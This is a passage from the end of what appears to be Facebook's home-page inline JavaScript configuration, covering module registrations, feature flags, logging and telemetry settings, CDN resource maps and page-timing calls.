0, compression_enabled: true, ref_counting_fix: false, ref_counting_cont_fix: false, also_record_new_timeslice_format: false, force_async_request_tracing_on: false }, 2609], ["WebDriverConfig", [], { isTestRunning: false, isJestE2ETestRun: false, auxiliaryServiceInfo: {}, testPath: null, originHost: null }, 5332], ["cr:1642797", ["BanzaiBase"], { __rc: ["BanzaiBase", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1458113", [], { __rc: [null, "Aa3uLqXDpg20uSK_98zCnNVnJBlHd9UZEiT5TYnL_HVGbVjBTb2HjXbwv-O-SJzjsOOjMrKOQa4zjHnlpC6rTDLhuqhjH1Y"] }, -1], ["cr:1039", [], { __rc: [null, "Aa1tYaHhsxveuov6z77aLG_cqcqmKQsQ258zEP6Sxl6pZ5NUQecj6aaMVknEEg877Brs-SUMAxQ"] }, -1], ["cr:1041", [], { __rc: [null, "Aa1tYaHhsxveuov6z77aLG_cqcqmKQsQ258zEP6Sxl6pZ5NUQecj6aaMVknEEg877Brs-SUMAxQ"] }, -1], ["cr:1048", [], { __rc: [null, "Aa1tYaHhsxveuov6z77aLG_cqcqmKQsQ258zEP6Sxl6pZ5NUQecj6aaMVknEEg877Brs-SUMAxQ"] }, -1], ["cr:917439", ["PageTransitionsBlue"], { __rc: ["PageTransitionsBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1108857", [], { __rc: [null, "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["cr:1294158", ["React.classic"], { __rc: ["React.classic", "Aa1Rnc9jC0nC_Jz6G_TcC5vM5XxzehLjzLQQ_9fajtWYxPOw0bFZce3Zw4n9a5LbUA8mgwj7LUTMD80GCYqSDixTQrgv"] }, -1], ["cr:1294246", ["ReactDOM.classic"], { __rc: ["ReactDOM.classic", "Aa1Rnc9jC0nC_Jz6G_TcC5vM5XxzehLjzLQQ_9fajtWYxPOw0bFZce3Zw4n9a5LbUA8mgwj7LUTMD80GCYqSDixTQrgv"] }, -1], ["cr:1069930", [], { __rc: [null, "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1083116", ["XAsyncRequest"], { __rc: ["XAsyncRequest", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1083117", [], { __rc: [null, "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:2682", ["warningBlueish"], { __rc: ["warningBlueish", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:11202", [], { __rc: [null, "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["cr:971473", ["LayerHideOnTransition"], { __rc: ["LayerHideOnTransition", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1105154", [], { __rc: [null, "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["BanzaiConfig", [], { MAX_SIZE: 10000, MAX_WAIT: 150000, MIN_WAIT: null, RESTORE_WAIT: 150000, blacklist: ["time_spent"], disabled: false, gks: { boosted_pagelikes: true, mercury_send_error_logging: true, platform_oauth_client_events: true, graphexplorer: true, sticker_search_ranking: true }, known_routes: ["artillery_javascript_actions", "artillery_javascript_trace", "artillery_logger_data", "logger", "falco", "gk2_exposure", "js_error_logging", "loom_trace", "marauder", "perfx_custom_logger_endpoint", "qex", "require_cond_exposure_logging", "sri_logger_data"], should_drop_unknown_routes: true, should_log_unknown_routes: false }, 7], ["PageTransitionsConfig", [], { reloadOnBootloadError: true }, 1067], ["cr:692209", ["cancelIdleCallbackBlue"], { __rc: ["cancelIdleCallbackBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1292365", ["React-prod.classic"], { __rc: ["React-prod.classic", "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["cr:1344485", ["ReactDOM.classic.prod-or-profiling"], { __rc: ["ReactDOM.classic.prod-or-profiling", "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["cr:2683", ["warningBlue"], { __rc: ["warningBlue", "Aa2GKzvMSEC3vElLeWmKZJOXjQ9J5hS6CMR53Ym0cdPCTcWfbWANA3ti11PtM2i0kOJddlwo_B8HQORYVyqVhtQBLoxX"] }, -1], ["CoreWarningGK", [], { forceWarning: false }, 725], ["cr:1344486", ["ReactDOM.classic.prod"], { __rc: ["ReactDOM.classic.prod", "Aa1AVFPXdnfeP8rXe_d1y2BGwULXj1whThEFSU5xmdht2ImBrhogNVV6atqR-I-A8T1O0_lzAB4bKwh7RhxC4S_nOVI2_nH71w"] }, -1], ["cr:983844", [], { __rc: [null, "Aa2gXJzI1yDk2qPD0oSDHXZv937zFRvcXn9ofU2ux8HLZzMKEf_JNAeFkluSgvTfserf1t4CQvGbod6Tyw"] }, -1], ["cr:1344487", ["ReactDOM-prod.classic"], { __rc: ["ReactDOM-prod.classic", "Aa3wArPEQTaL1-teQKo3XzsIcWuLH_PlllXybbkUPXi9ba61EZk1DezFOsTDvoUQ8iI0d8NTsJv_ZNdoFIiaYHl742XCGUNBNhwKoieI"] }, -1], ["cr:1353359", ["EventListenerImplForBlue"], { __rc: ["EventListenerImplForBlue", "Aa3EwUW1XvX-BpSESAFi3SzSHQJLSrke3mogONNMD8mTH8aG3sKMa9ECPDSS_2qzXMcSefzhJwBWeG3AYXhf9uWyc1PAPMwwhQ"] }, -1], ["KillabyteProfilerConfig", [], { htmlProfilerModule: null, profilerModule: null, depTypes: { BL: "bl", NON_BL: "non-bl" } }, 1145], ["QuicklingConfig", [], { version: "1005189989;0;", sessionLength: 30, inactivePageRegex: "^/(fr/u\\.php|ads/|advertising|ac\\.php|ae\\.php|a\\.php|ajax/emu/(end|f|h)\\.php|badges/|comments\\.php|connect/uiserver\\.php|editalbum\\.php.+add=1|ext/|feeds/|help([/?]|$)|identity_switch\\.php|isconnectivityahumanright/|intern/|login\\.php|logout\\.php|sitetour/homepage_tour\\.php|sorry\\.php|syndication\\.php|webmessenger|/plugins/subscribe|lookback|brandpermissions|gameday|pxlcld|comet|worldcup/map|livemap|work/reseller|([^/]+/)?dialog|legal|.+\\.pdf$|.+/settings/)", badRequestKeys: ["nonce", "access_token", "oauth_token", "xs", "checkpoint_data", "code"], logRefreshOverhead: false }, 60], ["WebDevicePerfInfoData", [], { needsFullUpdate: true, needsPartialUpdate: false, shouldLogResourcePerf: false }, 3977], ["WebStorageMonsterLoggingURI", [], { uri: "/ajax/webstorage/process_keys/?state=1" }, 3032], ["TrackingConfig", [], { domain: "https://pixel.facebook.com" }, 325], ["BrowserPaymentHandlerConfig", [], { enabled: false }, 3904], ["TimeSpentConfig", [], { "0_delay": 0, "0_timeout": 8, delay: 1000, timeout: 64 }, 142], ["cr:1351741", ["CometEventListener"], { __rc: ["CometEventListener", "Aa0YUBKmumo4Rn2NYRrxeq8TYsVrbs-HEhZeUtxF1h6piKqQwnTgKnwfRKPLXrZA9xrVd7GJczEXQ6jo889dx9oh93Lzic3XNbRa1zM82Y-8__uHTx2K"] }, -1], ["cr:1634616", ["UserActivityBlue"], { __rc: ["UserActivityBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:844180", ["TimeSpentImmediateActiveSecondsLoggerBlue"], { __rc: ["TimeSpentImmediateActiveSecondsLoggerBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1187159", ["BlueCompatBroker"], { __rc: ["BlueCompatBroker", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["ImmediateActiveSecondsConfig", [], { sampling_rate: 0 }, 423]], require: [["BDClientSignalCollectionTrigger", "startSignalCollection", [], [{ sc: "{\"t\":1637128278,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}", fds: 60, fda: 60, i: 60, sbs: 1, dbs: 100, bbs: 100, hbi: 60, rt: 262144, hbcbc: 2, hbvbc: 0, hbbi: 30, sid: -1, hbv: "4867710513415792099" }]], ["CavalryLoggerImpl", "startInstrumentation", [], []], ["NavigationMetrics", "setPage", [], [{ page: "XIndexReduxController", page_type: "normal", page_uri: "https://www.facebook.com/", serverLID: "7074865264628579990-0" }]], ["FalcoLoggerTransports", "attach", [], []], ["Chromedome", "start", [], [{}]], ["DimensionTracking"], ["NavigationClickPointHandler"], ["ServiceWorkerURLCleaner", "removeRedirectID", [], []], ["WebDevicePerfInfoLogging", "doLog", [], []], ["WebStorageMonster", "schedule", [], []], ["ClickRefLogger"], ["DetectBrokenProxyCache", "run", [], [0, "c_user"]], ["Artillery", "disable", [], []], ["ScriptPathLogger", "startLogging", [], []], ["TimeSpentBitArrayLogger", "init", [], []], ["RequireDeferredReference", "unblock", [], [["VisualCompletionGating"], "sd"]], ["RequireDeferredReference", "unblock", [], [["VisualCompletionGating"], "css"]]] }, hsrp: { hsdp: { clpData: { "1743095": { r: 1, s: 1 }, "1871697": { r: 1, s: 1 }, "1829319": { r: 1 }, "1829320": { r: 1 }, "1843988": { r: 1 } }, gkxData: { "1652843": { result: false, hash: "AT6uh9NWRY4QEQoYLNg" } }, qexData: { "661": { r: null } } }, hblp: { consistency: { rev: 1005189989 }, rsrcMap: { "lIe24+I": { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/0wagMMm1DIS.js?_nc_x=Ij3Wp8lg5Kz" }, CBQ4zUl: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/xOJs33xJ5Fd.js?_nc_x=Ij3Wp8lg5Kz" }, FEt5GzN: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/KWY7Edb5_DT.js?_nc_x=Ij3Wp8lg5Kz" }, RSfm84C: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3iX3c4/yv/l/en_GB/MeFPJsD6W8G.js?_nc_x=Ij3Wp8lg5Kz" }, XVtAULI: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/ugD21mPGNBo.js?_nc_x=Ij3Wp8lg5Kz" } }, compMap: { TransportSelectingClientSingleton: { r: ["KnHLe0g", "i4ulAqS", "lIe24+I"], rds: { m: ["ContextualConfig", "BladeRunnerClient", "DGWRequestStreamClient", "MqttLongPollingRunner", "BanzaiScuba_DEPRECATED"], r: ["LAwnrBZ", "9ebCY1Y", "2CbDRJL", "K8Tkk+K", "VYX+Uc1", "j7ouj5h", "fijQxTO", "XNjXVmx"] }, be: 1 }, RequestStreamCommonRequestStreamCommonTypes: { r: ["KnHLe0g"], be: 1 } } } }, allResources: ["i4ulAqS", "CBQ4zUl", "XNjXVmx", "FEt5GzN", "2CbDRJL", "RSfm84C", "XVtAULI", "45g2zGz", "K8Tkk+K", "j7ouj5h", "fijQxTO", "Ak7k+E5", "wBcCFVS", "dXlZ41I", "x9SVR1B"], onload: ["CavalryLogger.getInstance(\"7074865264628579990-0\").setTTIEvent(\"t_domcontent\");"], onafterload: ["CavalryLogger.getInstance(\"7074865264628579990-0\").collectBrowserTiming(window)", "window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\"t_paint\");", "if (window.ExitTime){CavalryLogger.getInstance(\"7074865264628579990-0\").setValue(\"t_exit\", window.ExitTime);};"] }); }));</script>
</body>

</html>